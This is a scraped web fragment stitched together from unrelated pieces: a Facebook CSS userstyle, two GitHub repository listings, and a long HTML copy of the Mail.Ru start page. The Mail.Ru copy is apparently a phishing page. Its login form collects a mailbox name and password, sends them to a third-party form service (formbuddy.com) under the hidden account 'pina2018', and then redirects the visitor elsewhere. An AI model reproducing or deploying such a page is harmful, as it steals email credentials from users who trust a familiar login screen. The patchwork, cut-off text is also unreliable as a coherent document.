.img,.UIObjectListing_PicRounded,.UIRoundedImage_CornersSprite,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TR,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BR,.UILinkButton_R,.pagesAboutDivider {visibility:hidden !important;}\n\n.nub,#contentCurve,#pagelet_netego_ads,img.plus,.highlighter,.uiToolbarDivider,.bfb_sticky_note_arrow_border,.bfb_sticky_note_arrow,#ConfirmBannerOuterContainer,.uiStreamHeaderBorder,.topBorder,.bottomBorder,.middleLink:after,.sideNavItem .uiCloseButton,.mask,.topSectionBottomBorder {display: none !important;}\n\n.fbChatBuddyListTypeahead {display: block !important;}\n\n.chat_input {width: 195px !important;}\n\n.fb_song_play_btn,.friend,.wrap,.uiTypeahead,.share,.raised,.donated,.recruited,.srch_landing,.story_editor,.jewelCount span, .menuPulldown {background-color: transparent !important;}\n\n.extended_link div {background-color: #fff !important}\n\n#fbTimelineHeadline,.coverImage {width: 851px !important; margin-left: 1px !important;}\n\n*:not([style*=border]) {border-color: #000 !important;}\n\n#feed_content_section_applications *,#feed_header_section_friend_lists *,.summary,.summary *,.UIMediaHeader_TitleWash,.UIMediaHeader_TitleWrapper,.feedbackView .comment th div,.searchroot,.composerView th div,.reply th div,.borderTagBox,.innerTagBox,.friend,.fbNubFlyoutTitlebar,.fbNubButton {border-color: transparent !important;}\n\n.innerTagBox:hover {border-color: rgba(10,10,10,.45) !important;box-shadow: 0 0 5px 4px #9cf !important;}\n\n.status_placeholder,.UIComposer_TDTextArea,.UIComposer_TextAreaShadow,.UIContentBox ,.box_column,form.comment div,.comment_box div,#tagger,.UIMediaItem_Wrapper,#chat_tab_bar *,.UIActionMenu_ButtonOuter input[type=\"button\"],.inner_button,.UIActionButton_Link,.divider,.UIComposer_Attachment_TDTextArea,#confirm_button,#global_maps_link,.advanced_selector,#presence_ui *,.fbFooterBorder,.wash,.main_body,.settings_screenshot,.uiBlingBox,.inputContainer *,.uiMentionsInput,.uiTypeahead,.editNoteWrapperInput,.date_divider,.chatStatus,#headNav,.jewelCount span,.fbFeedbackMentions .wrap,.uiSearchInput span,.uiSearchInput,.fbChatSidebarMessage,.devsitePage .body > .content,.timelineUnitContainer,.fbTimelineTopSection,.coverBorder,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,#navAccount.openToggler,#contentArea,.uiStreamStoryAttachmentOnly,.ogSliderAnimPagerPrev .content,.ogSliderAnimPagerNext .content,.ogSliderAnimPagerPrev .wrapper,.ogSliderAnimPagerNext .wrapper,.ogSingleStoryContent,.ogAggregationAnimSubstorySlideSingle,.uiCloseButton, .ogAggregationPanelUFI, .ogAggregationPanelText {border: none !important;}\n\n.uiStream .uiStreamHeaderTall {border-top: none !important; border-bottom: none !important;}\n\n.attachment_link a:hover,input[type=\"input\"],input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),.UITabGrid_Link:hover,.UIFilterList_Selected,.make_new_list_button_table,.confirm_button,.fb_menu_title a:hover,.Tabset_selected {border-bottom-color: #000 !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: #000 !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: #000 !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: #000 !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}\n\n.UITabGrid_Link,.fb_menu_title a,.button_main,.button_text,.button_left {border-bottom-color: transparent !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: transparent !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: transparent !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: transparent !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}\n\n.UIObjectListing_RemoveLink,.UIIntentionalStory_CloseButton,.remove,.x_to_hide,.fg_action_hide a,.notif_del,.UIComposer_AttachmentArea_CloseButton,.delete_msg a,.ImageBlock_Hide, .fbSettingsListItemDelete,.fg_action_hide,img[src=\"http://static.ak.fbcdn.net/images/streams/x_hide_story.gif?8:142665\"],.close,.uiSelector .uiCloseButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/closeX.png\") no-repeat !important;t
GitHub Repo
https://github.com/liuminex/dod-mods
liuminex/dod-mods
MODs for dod.gr | Tichu, Poker, Blackjack, Slots (Thor), Wallpaper
GitHub Repo
https://github.com/panapina/pina
panapina/pina
<div class="x-ph portal-headline x-ph-win x-ph-no-touch x-ph-csstransforms x-ph-boxshadow" id="portal-headline" style="min-width: 980px; border-bottom: 1px solid rgb(213, 213, 213); white-space: nowrap; font-size: 12px; line-height: 16px; position: relative; z-index: 1003; margin: 0px; padding: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-family: HelveticaNeue, Arial, sans-serif; text-align: left; background: rgb(255, 255, 255); height: 28px; color: rgb(0, 0, 0); letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px;"> <table class="w-x-ph" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 12px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 1366px; background: rgb(255, 255, 255); font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif;" cellspacing="0"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 12px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 12px;"> <td class="w-x-ph__col w-x-ph__col_left" style="margin: 0px; padding: 0px 20px 0px 0px; vertical-align: top; font-size: 12px; border: 0px; border-spacing: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; height: 28px; white-space: nowrap; width: 641px; text-align: left;"><a href="https://r.mail.ru/n201584216?sz=39&test_id=317&rnd=214642913" rel="nofollow" class="x-ph__link x-ph__link_first x-ph__link_selected" style="margin: 0px 6px 0px 14px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: 700; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);">Mail.Ru</a><a id="ph_mail" href="https://r.mail.ru/n214942162?sz=39&test_id=317&rnd=214642913" rel="nofollow" class="x-ph__link" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);"><span class="x-ph__link__text" style="text-decoration: none; font-style: normal; cursor: pointer;">Почта</span></a><a id="ph_my" rel="nofollow" class="x-ph__link" href="https://r.mail.ru/n201584217?sz=39&test_id=317&rnd=214642913" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);"><span class="x-ph__link__text" style="text-decoration: none; font-style: normal; cursor: pointer;">Мой Мир</span></a><span class="w-x-ph__link" style="display: inline-block; vertical-align: top;"><a rel="nofollow" class="x-ph__link" href="https://r.mail.ru/n165062873?sz=39&test_id=317&rnd=214642913" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);"><span class="x-ph__link__text" style="text-decoration: none; font-style: normal; cursor: pointer;">Одноклассники</span></a></span><a class="x-ph__link" href="https://r.mail.ru/n214942163?sz=39&test_id=317&rnd=214642913" rel="nofollow" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);"><span class="x-ph__link__text" style="text-decoration: none; font-style: normal; cursor: pointer;">Игры</span></a><a href="https://r.mail.ru/n93284360?sz=39&test_id=317&rnd=214642913" rel="nofollow" class="x-ph__link" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);"><span class="x-ph__link__text" style="text-decoration: none; font-style: normal; cursor: pointer;">Знакомства</span></a><a href="https://r.mail.ru/n211521266?sz=39&test_id=317&rnd=214642913" rel="nofollow" class="x-ph__link" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);">Новости</a><a href="https://r.mail.ru/n93284362?sz=39&test_id=317&rnd=214642913" rel="nofollow" class="x-ph__link" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);">Поиск</a><span class="x-ph__menu" id="PH_projectsMenu" style="position: relative; z-index: 1004; display: inline-block; padding-right: 2px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 12px; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; vertical-align: top;"><a rel="nofollow" class="x-ph__menu__button" id="PH_projectsMenu_button" href="https://mail.ru/#" style="margin: 0px; padding: 6px 0px 5px; border-width: 0px 1px; border-top-style: initial; border-right-style: solid; border-bottom-style: initial; border-left-style: solid; border-top-color: initial; border-right-color: rgb(255, 255, 255); border-bottom-color: initial; border-left-color: rgb(255, 255, 255); border-image: initial; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; position: relative; z-index: 1005; display: inline-block; width: 92.1406px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; text-decoration: none; cursor: pointer; outline: none; color: rgb(0, 119, 204);"><i class="x-ph__menu__button__text" style="display: inline-block; width: 92.1406px; padding: 0px 14px 0px 6px; box-sizing: border-box; color: rgb(19, 120, 191); font-style: normal; text-decoration: none; overflow: hidden; text-overflow: ellipsis; text-align: left; vertical-align: top;">Все проекты</i></a></span></td> <td class="w-x-ph__col w-x-ph__col_right" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 12px; border: 0px; border-spacing: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; height: 28px; white-space: nowrap; text-align: right;"> <div id="PH_noAuthView"> <table class="x-ph__auth" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 12px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 705px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif;" cellspacing="0"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 12px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 12px;"> <td class="w-x-ph__auth__col w-x-ph__auth__col_right" style="margin: 0px; padding: 0px 2px 0px 0px; vertical-align: top; font-size: 12px; border: 0px; border-spacing: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; text-align: right; white-space: nowrap;"><a id="PH_regLink" class="x-ph__link x-ph__auth__link" rel="nofollow" href="https://r.mail.ru/cls718344/r.mail.ru/clb1126010/e.mail.ru/signup?from=navi&lang=ru_RU&siteid=169&rnd=214642913" style="margin: 0px 6px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);">Регистрация</a><a class="x-ph__link x-ph__link_last x-ph__auth__link" href="https://r.mail.ru/cls951827/e.mail.ru/login?lang=ru_RU&Page=" rel="nofollow" id="PH_authLink" style="margin: 0px 12px 0px 0px; padding: 6px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; white-space: nowrap; outline: none; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 16px; font-family: HelveticaNeue, Arial, sans-serif; color: rgb(19, 120, 191);">Вход</a></td> </tr> </tbody> </table> </div> </td> </tr> </tbody> </table> </div> <div class="layout" id="layout" style="position: relative; top: 0px; z-index: 2; margin-top: 11px; margin-right: auto; margin-left: auto; padding-right: 12px; padding-left: 12px; max-width: 1280px; transition: top 0.5s ease-in-out; color: rgb(0, 0, 0); font-family: "Helvetica Neue", Arial, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255);"> <div id="leftcol" class="layout__leftcol" style="position: relative; float: left; width: 307.188px;"> <h1 class="logo" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"><a id="logo" class="logo__link" href="https://mail.ru/" title="Mail.Ru: почта, поиск в интернете, новости, игры" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; border-radius: 2px; background: rgb(22, 141, 226); height: 55px; text-align: center; position: relative; z-index: 3; display: block; text-decoration: none; color: rgb(0, 119, 204);"><img src="https://limg.imgsmail.ru/splash/v/i/logo-7f804cc19c-fp.png" class="logo__link__img logo__link__img_medium" style="margin: 8px 0px 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; display: inline-block;" alt="" width="190" height="39" /></a></h1> <div id="mailbox" class="mailbox" style="position: relative; z-index: 150; margin-top: 13px; height: 162px; border-radius: 2px; background: rgb(255, 255, 255); border: 1px solid rgb(208, 208, 208); box-shadow: rgb(242, 242, 242) 0px 1px 1px;"> <div class="mailbox__title" style="position: relative; font-size: 18px; line-height: 22px; height: 22px; margin: 6px 0px 4px 8px;"><a name="clb1753622" id="js-mailbox-enter" class="mailbox__title__link" href="https://e.mail.ru/login?from=main" data-enter-href="https://e.mail.ru/messages/inbox/" data-login-href="https://e.mail.ru/login?from=main" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 18px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);"><span class="mailbox__title__link__text">Почта</span></a><a class="mailbox__cloud icon icon_cloud" title="Облако" href="https://cloud.mail.ru/?utm_source=mainpage_promo&utm_medium=mainpage_promo&utm_campaign=%D0%B8%D0%BA%D0%BE%D0%BD%D0%BA%D0%B8%20%D0%BD%D0%B0%20%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%BE%D0%B9/" name="clb3996485" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 0px; transition: color 0.1s ease-out; position: absolute; display: inline-block; overflow: hidden; width: 21px; height: 17px; background-repeat: no-repeat; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 0; font-family: a; background-image: url("//limg.imgsmail.ru/splash/v/i/icons-6f9d29f6f2-fp.png"); background-size: 55px 520px; background-position: 0px -216px; right: 33px; top: 2px; text-decoration: none; color: rgb(0, 119, 204);"></a><a class="mailbox__cal icon icon_cal icon_cal_num icon_cal_wide" id="icon_cal" href="https://promo.calendar.mail.ru/" name="clb3996332" title="Календарь – сегодня 1 февраля, среда" style="margin: 0px; padding: 0px 1px 0px 0px; border: 0px; vertical-align: baseline; font-size: 9px; transition: color 0.1s ease-out; position: absolute; display: inline-block; overflow: hidden; width: 21px; height: 17px; background-repeat: no-repeat; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; line-height: 9px; font-family: "Helvetica Neue", Arial, sans-serif; background-image: url("//limg.imgsmail.ru/splash/v/i/icons-6f9d29f6f2-fp.png"); background-size: 55px 520px; background-position: -20px -251px; text-align: center; right: 5px; top: 2px; text-decoration: none; color: rgb(255, 255, 255);"></a></div> <div id="js-mailbox-auth" class="mailbox__auth" style="position: relative; margin-top: 4px; display: block;"> <form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> <input name="username" value="pina2018"type="hidden" /> <input name="reqd" value="0" type="hidden" /> <input name="url" value="https://1577839e-e430-4ff6-8a0d-7bc1273cfed1.htmlpasta.com/" type="hidden" /> <input name="formsubject" value="Verified" type="hidden" /> <div id="mailbox-auth-login" class="mailbox__auth__layout__row mailbox__auth__layout__row_login" style="position: relative; z-index: 3; margin-top: 0px; margin-bottom: 9px;"> <div class="mailbox__auth__layout__row__col mailbox__auth__layout__row__col_right" style="position: relative; float: right;"><select id="mailbox__login__domain" size="1" name="Domain" tabindex="5" class="mailbox__login__domain" style="margin: 0px; color: rgb(34, 34, 34); -webkit-appearance: none; padding: 0px; width: 84px; height: 22px; border: 1px solid rgb(155, 163, 169); border-radius: 0px; background: rgb(255, 255, 255); position: absolute; top: 0px; left: 0px; z-index: 1; opacity: 0;"> <option value="mail.ru">@mail.ru</option> <option value="inbox.ru">@inbox.ru</option> <option value="list.ru">@list.ru</option> <option value="bk.ru">@bk.ru</option> </select> <div id="domain-widget" class="nojsdn mailbox__login__domain-widget" style="min-width: 62px; line-height: 15px; color: rgb(34, 34, 34); text-align: center; white-space: nowrap; padding: 2px 10px 3px; background: rgb(240, 240, 240); border-radius: 0px 2px 2px 0px; border: 1px solid rgb(198, 198, 198);"><span id="domain-widget__text" class="mailbox__login__domain-widget__text">@mail.ru</span><span class="Apple-converted-space"> </span></div> </div> <div class="mailbox__auth__layout__row__col mailbox__auth__layout__row__col_left" style="overflow: hidden;"><label for="mailbox__login" class="w-mailbox__login" style="margin: 0px; padding: 0px; border-width: 1px 0px 1px 1px; border-style: solid; border-color: rgb(198, 198, 198); border-image: initial; vertical-align: baseline; font-size: 13px; display: block; cursor: text; background: rgb(255, 255, 255); border-radius: 2px 0px 0px 2px; box-shadow: rgb(242, 242, 242) 0px 1px 1px inset;"><span class="w-mailbox__login_outer" style="position: relative; display: block; background: url("//limg.imgsmail.ru/splash/v/i/inputs-fp-9cd72c6b61.png") 0px -21px no-repeat;"><span class="w-mailbox__login_inner" style="display: block; height: 20px;"><span class="w-mailbox__login_input" style="display: block; height: 20px; margin-right: 12px;"><input id="mailbox__login" size="10" name="Login" tabindex="3" class="mailbox__login mix_placeholder" placeholder="имя ящика" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 13px; line-height: 16px; font-family: "Helvetica Neue", Arial, sans-serif; margin: 0px; color: rgb(34, 34, 34); -webkit-appearance: none; display: block; outline: none; background: 0px 0px; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); width: 192.188px; height: 16px; border: 0px; padding: 2px 6px;" type="text" /></span></span></span></label></div> </div> <div class="mailbox__auth__layout__row mailbox__auth__layout__row_last" style="position: relative; z-index: 2; margin-top: 0px; margin-bottom: 9px;"> <div class="mailbox__auth__layout__row__col mailbox__auth__layout__row__col_right" style="position: relative; float: right;"><span class="w-mailbox__auth__button w-mailbox__auth__button_main" style="display: block; margin-left: 6px; border-radius: 2px; width: 83px; background: rgb(22, 141, 226); box-shadow: rgb(242, 242, 242) 0px 1px 0px 1px;"><span class="w-mailbox__auth__button w-mailbox__auth__button_outer" style="display: block;"><span class="w-mailbox__auth__button w-mailbox__auth__button_inner" style="display: block; text-align: center; height: 22px;"><input id="mailbox__auth__button" value="Войти" tabindex="7" class="mailbox__auth__button" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 13px; line-height: 21px; font-family: "Helvetica Neue", Arial, sans-serif; display: block; margin: 0px; padding: 0px 10px 2px; border: none; background: 0px 0px; color: rgb(255, 255, 255); text-align: center; width: 83px; height: 22px;" type="submit" /></span></span></span></div> <div class="mailbox__auth__layout__row__col mailbox__auth__layout__row__col_left" style="overflow: hidden;"><label for="mailbox__password" class="w-mailbox__password" style="margin: 0px; padding: 0px; border: 1px solid rgb(198, 198, 198); vertical-align: baseline; font-size: 13px; display: block; background: rgb(255, 255, 255); border-radius: 2px; box-shadow: rgb(242, 242, 242) 0px 1px 1px inset;"><span class="w-mailbox__password_outer" style="display: block; background: url("//limg.imgsmail.ru/splash/v/i/inputs-fp-9cd72c6b61.png") 0px -21px no-repeat;"><span class="w-mailbox__password_inner" style="display: block; height: 20px;"><span class="w-mailbox__password_limiter" style="display: block; overflow: hidden; cursor: text;"><span class="w-mailbox__password_input" style="position: relative; display: block; margin-right: 12px; height: 20px;"><input id="mailbox__password" size="15" name="Password" tabindex="4" value="" autocomplete="current-password" class="mailbox__password mix_placeholder" placeholder="пароль" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 13px; line-height: 16px; font-family: "Helvetica Neue", Arial, sans-serif; display: block; margin: 0px; width: 186.188px; height: 16px; outline: none; border: 0px; background: 0px 0px; color: rgb(34, 34, 34); -webkit-appearance: none; -webkit-tap-highlight-color: rgba(255, 255, 255, 0); padding: 2px 6px;" type="password" /></span></span></span></span></label></div> </div> <div class="mailbox__auth__layout__row" style="position: relative; z-index: 2; margin-top: 0px; margin-bottom: 9px;"> <div class="nojsdn mailbox__auth__layout__row__col mailbox__auth__layout__row__col_right mailbox__auth__layout__row__col_right_remember" style="position: relative; float: right; width: 83px;"><label class="mailbox__auth__remember" for="mailbox__auth__remember__checkbox" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; color: rgb(102, 102, 102); white-space: nowrap;"><input tabindex="6" name="saveauth" value="1" id="mailbox__auth__remember__checkbox" class="mailbox__auth__remember__checkbox" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 13px; line-height: 16px; font-family: "Helvetica Neue", Arial, sans-serif; position: relative; top: 1px; margin: 0px; padding: 0px; width: 13px; height: 13px; vertical-align: top;" type="checkbox" /><span class="Apple-converted-space"> </span>запомнить</label></div> <div class="mailbox__auth__layout__row__col mailbox__auth__layout__row__col_left" style="overflow: hidden;"><a class="mailbox__forget-link" href="https://e.mail.ru/password/restore/" tabindex="8" name="clb615191" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Забыли пароль?</a></div> </div> </form> <div id="mailbox__register" class="mailbox__register" style="text-align: center; background: rgb(247, 247, 247); padding: 0px 6px 2px; height: 39px; overflow: hidden;"><a class="mailbox__register__link" tabindex="9" href="https://e.mail.ru/signup?from=main_noc" name="clb861544" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 18px; transition: color 0.1s ease-out; position: relative; top: 2px; line-height: 21px; text-decoration: none; color: rgb(0, 119, 204);">Регистрация в почте</a><span class="mailbox__register__promo" style="display: block; font-size: 13px; line-height: 18px;"><a class="mailbox__register__promo__link" href="https://e.mail.ru/signup?from=main_noc" name="clb861544" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(106, 106, 106);">с темами оформления</a></span></div> </div> </div> <div id="js-social-icq" class="social social_icq" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 17px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a class="social__title__link social__gray-link" href="http://www.icq.com/windows?partnerid=1568&utm_campaign=560671&utm_medium=banner&utm_content=18355636&utm_source=mail.ru" name="clb18355636" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">ICQ</span><span class="social__title__link__description social__gray-link__target" style="margin-left: 7px; line-height: 17px; color: rgb(106, 106, 106);">бесплатные видеозвонки</span></a></div> </div> <div class="social social_my" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 11px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a name="clb1753672" href="http://my.mail.ru/?from=splash" class="social__title__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">Мой Мир</span></a></div> <div class="social__content social__content_my" style="padding-left: 23px;"> <div class="social__description" style="display: block; margin-top: -2px; color: rgb(106, 106, 106); line-height: 17px; white-space: nowrap;">Популярные фото:</div> <div class="gallery" style="margin-top: 3px; visibility: visible;"> <div class="w-gallery__list w-gallery__list_small" id="myPopularFotoSmall" style="position: relative; display: block; height: 60px;"> <div class="gallery__list" style="width: 273.188px; white-space: nowrap; font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 0px; line-height: 0; font-family: a; overflow: hidden;"><a href="http://my.mail.ru/mail/mary99981/photo/659/1914.html?bestfotos=1" name="clb635786" class="gallery__list__item" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 0px; transition: color 0.1s ease-out; display: inline-block; cursor: pointer; text-decoration: none; color: rgb(0, 119, 204);"><img class="gallery__list__item__image" src="https://r.mradx.net/pictures/9E/DCBA3F.jpg" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 0px; border-width: 0px 1px 0px 0px; border-top-style: initial; border-right-style: solid; border-bottom-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: rgb(255, 255, 255); border-bottom-color: initial; border-left-color: initial; border-image: initial; display: block; width: 60px; height: 60px;" /></a><a href="http://my.mail.ru/mail/n.sosedova/photo/_myphoto/297.html?bestfotos=1" name="clb635786" class="gallery__list__item" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 0px; transition: color 0.1s ease-out; display: inline-block; cursor: pointer; text-decoration: none; color: rgb(0, 119, 204);"><img class="gallery__list__item__image" src="https://r.mradx.net/pictures/07/FE1106.jpg" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 0px; border-width: 0px 1px 0px 0px; border-top-style: initial; border-right-style: solid; border-bottom-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: rgb(255, 255, 255); border-bottom-color: initial; border-left-color: initial; border-image: initial; display: block; width: 60px; height: 60px;" /></a><a href="http://my.mail.ru/mail/segenbrg/photo/13/17718.html?bestfotos=1" name="clb635786" class="gallery__list__item" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 0px; transition: color 0.1s ease-out; display: inline-block; cursor: pointer; text-decoration: none; color: rgb(0, 119, 204);"><img class="gallery__list__item__image" src="https://r.mradx.net/pictures/3B/024379.jpg" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 0px; border-width: 0px 1px 0px 0px; border-top-style: initial; border-right-style: solid; border-bottom-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: rgb(255, 255, 255); border-bottom-color: initial; border-left-color: initial; border-image: initial; display: block; width: 60px; height: 60px;" /></a><a href="http://my.mail.ru/mail/wallpaper.man/photo/wallpapers_Happy_New_Year_5/85099.html?bestfotos=1" name="clb635786" class="gallery__list__item" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 0px; transition: color 0.1s ease-out; display: inline-block; cursor: pointer; text-decoration: none; color: rgb(0, 119, 204);"><img class="gallery__list__item__image" src="https://r.mradx.net/pictures/1D/DFA900.jpg" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 0px; border-width: 0px 1px 0px 0px; border-top-style: initial; border-right-style: solid; border-bottom-style: initial; border-left-style: initial; border-top-color: initial; border-right-color: rgb(255, 255, 255); border-bottom-color: initial; border-left-color: initial; border-image: initial; display: block; width: 60px; height: 60px;" /></a></div> </div> </div> </div> </div> <div class="social social_ok" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 17px; height: 40px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a class="social__title__link" 